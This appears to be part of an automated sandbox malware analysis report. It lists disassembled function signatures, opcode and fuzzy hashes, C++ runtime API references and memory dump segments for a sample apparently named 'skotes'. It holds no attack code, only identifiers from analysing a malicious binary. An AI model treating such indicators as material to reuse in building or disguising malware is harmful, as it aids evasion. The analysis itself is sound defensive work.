                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Concurrency::details::$Context$Base::Internal$ChoreWork$AssociatedCancelCleanupCompletionCreateCurrentDispatchedExecuteExecutedFoundInlineListThreadWait
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2885714658-0
                                                                                                                                                                                                                                          • Opcode ID: 75956cdfc2b92d7d9b4ee5e30f812ce329004dd13273a072e6d4953f6ff76ee5
                                                                                                                                                                                                                                          • Instruction ID: 38ce99477773babdc67ad529cd2cb80b1ac9c396e6934381fd7e6488e38e955d
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 75956cdfc2b92d7d9b4ee5e30f812ce329004dd13273a072e6d4953f6ff76ee5
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BE41A830A046449ADF19FFB58496BAC7BE1AF11304F1840F9E8516B2D3CB388E08CB62
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • Concurrency::details::InternalContextBase::ReclaimVirtualProcessor.LIBCONCRT ref: 00B9E7D7
                                                                                                                                                                                                                                            • Part of subcall function 00B9E544: Concurrency::details::VirtualProcessor::Deactivate.LIBCONCRT ref: 00B9E577
                                                                                                                                                                                                                                            • Part of subcall function 00B9E544: Concurrency::details::VirtualProcessor::Deactivate.LIBCONCRT ref: 00B9E599
                                                                                                                                                                                                                                          • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 00B9E854
                                                                                                                                                                                                                                          • Concurrency::details::ScheduleGroupSegmentBase::ReleaseInternalContext.LIBCMT ref: 00B9E860
                                                                                                                                                                                                                                          • Concurrency::details::SchedulerBase::TriggerCommitSafePoints.LIBCMT ref: 00B9E86F
                                                                                                                                                                                                                                          • Concurrency::details::SchedulerBase::VirtualProcessorActive.LIBCONCRT ref: 00B9E879
                                                                                                                                                                                                                                          • Concurrency::location::_Assign.LIBCMT ref: 00B9E8AD
                                                                                                                                                                                                                                          • Concurrency::details::ScheduleGroupSegmentBase::AddRunnableContext.LIBCONCRT ref: 00B9E8B5
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000002.2973332284.0000000000B71000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B70000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973183378.0000000000B70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973332284.0000000000BD2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973940335.0000000000BD9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974116469.0000000000BDB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974330158.0000000000BE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974509112.0000000000BE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974706941.0000000000BE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975510008.0000000000D3A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975673102.0000000000D3D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975858151.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976010191.0000000000D54000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976133799.0000000000D57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976133799.0000000000D5E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976372810.0000000000D6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976588375.0000000000D6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976731520.0000000000D7B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976855106.0000000000D7C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977036956.0000000000D91000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977145651.0000000000D92000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977257068.0000000000D9A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977385733.0000000000DA7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977565674.0000000000DA8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978449942.0000000000DA9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978640930.0000000000DBB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978752510.0000000000DC2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978864602.0000000000DCA000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978946296.0000000000DCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979012965.0000000000DD5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979113130.0000000000DD6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979526112.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979623514.0000000000DEC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979728075.0000000000DF4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979818464.0000000000DF5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979915094.0000000000DFD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980008821.0000000000E00000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980111926.0000000000E10000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980212112.0000000000E13000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980212112.0000000000E3E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980665830.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980796943.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980939158.0000000000E6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981125789.0000000000E6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981254982.0000000000E6C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981448988.0000000000E71000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981597675.0000000000E73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981781764.0000000000E80000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981910800.0000000000E81000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_b70000_skotes.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Concurrency::details::$Base::$Context$Virtual$DeactivateGroupInternalProcessorProcessor::ScheduleSchedulerSegment$ActiveAssignCommitConcurrency::location::_EventPointsReclaimReleaseRunnableSafeTraceTrigger
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1924466884-0
                                                                                                                                                                                                                                          • Opcode ID: 93b53eb93cc95662364c19483deff1793b59d16b9f71ce74dd031a61305a1682
                                                                                                                                                                                                                                          • Instruction ID: e4348065f1b3b8d88eb13ab51f7fc85fefd2f172696ce4583d95a47fe6a3990c
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 93b53eb93cc95662364c19483deff1793b59d16b9f71ce74dd031a61305a1682
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C2410575A00204EFCF05EFA4C495AADB7F5FF48310F1880B9ED599B282DB30A941CBA1
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • __Mtx_unlock.LIBCPMT ref: 00B86ED1
                                                                                                                                                                                                                                          • std::_Rethrow_future_exception.LIBCPMT ref: 00B86F22
                                                                                                                                                                                                                                          • std::_Rethrow_future_exception.LIBCPMT ref: 00B86F32
                                                                                                                                                                                                                                          • __Mtx_unlock.LIBCPMT ref: 00B86FD5
                                                                                                                                                                                                                                          • __Mtx_unlock.LIBCPMT ref: 00B870DB
                                                                                                                                                                                                                                          • __Mtx_unlock.LIBCPMT ref: 00B87116
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000002.2973332284.0000000000B71000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B70000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973183378.0000000000B70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973332284.0000000000BD2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973940335.0000000000BD9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974116469.0000000000BDB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974330158.0000000000BE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974509112.0000000000BE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974706941.0000000000BE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975510008.0000000000D3A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975673102.0000000000D3D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975858151.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976010191.0000000000D54000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976133799.0000000000D57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976133799.0000000000D5E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976372810.0000000000D6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976588375.0000000000D6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976731520.0000000000D7B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976855106.0000000000D7C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977036956.0000000000D91000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977145651.0000000000D92000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977257068.0000000000D9A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977385733.0000000000DA7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977565674.0000000000DA8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978449942.0000000000DA9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978640930.0000000000DBB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978752510.0000000000DC2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978864602.0000000000DCA000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978946296.0000000000DCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979012965.0000000000DD5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979113130.0000000000DD6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979526112.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979623514.0000000000DEC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979728075.0000000000DF4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979818464.0000000000DF5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979915094.0000000000DFD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980008821.0000000000E00000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980111926.0000000000E10000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980212112.0000000000E13000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980212112.0000000000E3E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980665830.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980796943.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980939158.0000000000E6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981125789.0000000000E6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981254982.0000000000E6C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981448988.0000000000E71000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981597675.0000000000E73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981781764.0000000000E80000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981910800.0000000000E81000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_b70000_skotes.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Mtx_unlock$Rethrow_future_exceptionstd::_
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1997747980-0
                                                                                                                                                                                                                                          • Opcode ID: 1a09979c24aab3d66683a6d8bbc34ca242f9022ef4bcbae061fe0796bd91675b
                                                                                                                                                                                                                                          • Instruction ID: 59d79b58cbb30d681a4dce29b884f44305367d61f326c472238597afd119b0e7
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1a09979c24aab3d66683a6d8bbc34ca242f9022ef4bcbae061fe0796bd91675b
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F6C1D2B19042089FDB21EFB4C845BAFBBF4EF04314F1045ADE916976A1EB31E908CB61
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • ListArray.LIBCONCRT ref: 00B94538
                                                                                                                                                                                                                                          • ListArray.LIBCONCRT ref: 00B9456C
                                                                                                                                                                                                                                          • Hash.LIBCMT ref: 00B945D5
                                                                                                                                                                                                                                          • Hash.LIBCMT ref: 00B945E5
                                                                                                                                                                                                                                            • Part of subcall function 00B99C41: std::bad_exception::bad_exception.LIBCMT ref: 00B99C63
                                                                                                                                                                                                                                          • Concurrency::details::RegisterAsyncTimerAndLoadLibrary.LIBCONCRT ref: 00B9474B
                                                                                                                                                                                                                                          • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00B947A4
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000002.2973332284.0000000000B71000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B70000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973183378.0000000000B70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973332284.0000000000BD2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973940335.0000000000BD9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974116469.0000000000BDB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974330158.0000000000BE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974509112.0000000000BE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974706941.0000000000BE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975510008.0000000000D3A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975673102.0000000000D3D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975858151.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976010191.0000000000D54000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976133799.0000000000D57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976133799.0000000000D5E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976372810.0000000000D6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976588375.0000000000D6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976731520.0000000000D7B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976855106.0000000000D7C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977036956.0000000000D91000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977145651.0000000000D92000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977257068.0000000000D9A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977385733.0000000000DA7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977565674.0000000000DA8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978449942.0000000000DA9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978640930.0000000000DBB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978752510.0000000000DC2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978864602.0000000000DCA000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978946296.0000000000DCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979012965.0000000000DD5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979113130.0000000000DD6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979526112.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979623514.0000000000DEC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979728075.0000000000DF4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979818464.0000000000DF5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979915094.0000000000DFD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980008821.0000000000E00000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980111926.0000000000E10000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980212112.0000000000E13000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980212112.0000000000E3E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980665830.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980796943.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980939158.0000000000E6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981125789.0000000000E6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981254982.0000000000E6C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981448988.0000000000E71000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981597675.0000000000E73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981781764.0000000000E80000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981910800.0000000000E81000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_b70000_skotes.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ArrayHashList$AsyncConcurrency::details::Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorLibraryLoadRegisterTimerstd::bad_exception::bad_exception
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3010677857-0
                                                                                                                                                                                                                                          • Opcode ID: 95af636800ce82aa54a8a5b98eceae9bbfa3ef2bef84caef9ab511d9f8dfd1e6
                                                                                                                                                                                                                                          • Instruction ID: ece0c58c65901a036cbcbcdd12ba9aceb850358bd76e487b5e3aaad77ede8cf4
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 95af636800ce82aa54a8a5b98eceae9bbfa3ef2bef84caef9ab511d9f8dfd1e6
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E58143B0A11A56BADB08DF788845BD9FBE8BF09704F10426AF428D7281DBB4A554CBD1
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • _SpinWait.LIBCONCRT ref: 00B8EEBC
                                                                                                                                                                                                                                          • Concurrency::details::WaitBlock::WaitBlock.LIBCMT ref: 00B8EEC8
                                                                                                                                                                                                                                          • Concurrency::details::_NonReentrantPPLLock::_Scoped_lock::_Scoped_lock.LIBCONCRT ref: 00B8EEE1
                                                                                                                                                                                                                                          • Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock.LIBCONCRT ref: 00B8EF0F
                                                                                                                                                                                                                                          • Concurrency::Context::Block.LIBCONCRT ref: 00B8EF31
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000002.2973332284.0000000000B71000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B70000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973183378.0000000000B70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973332284.0000000000BD2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973940335.0000000000BD9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974116469.0000000000BDB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974330158.0000000000BE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974509112.0000000000BE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974706941.0000000000BE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975510008.0000000000D3A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975673102.0000000000D3D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975858151.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976010191.0000000000D54000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976133799.0000000000D57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976133799.0000000000D5E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976372810.0000000000D6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976588375.0000000000D6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976731520.0000000000D7B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976855106.0000000000D7C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977036956.0000000000D91000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977145651.0000000000D92000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977257068.0000000000D9A000.00000080.00000001.01000000.00000007.sdmpDownload File
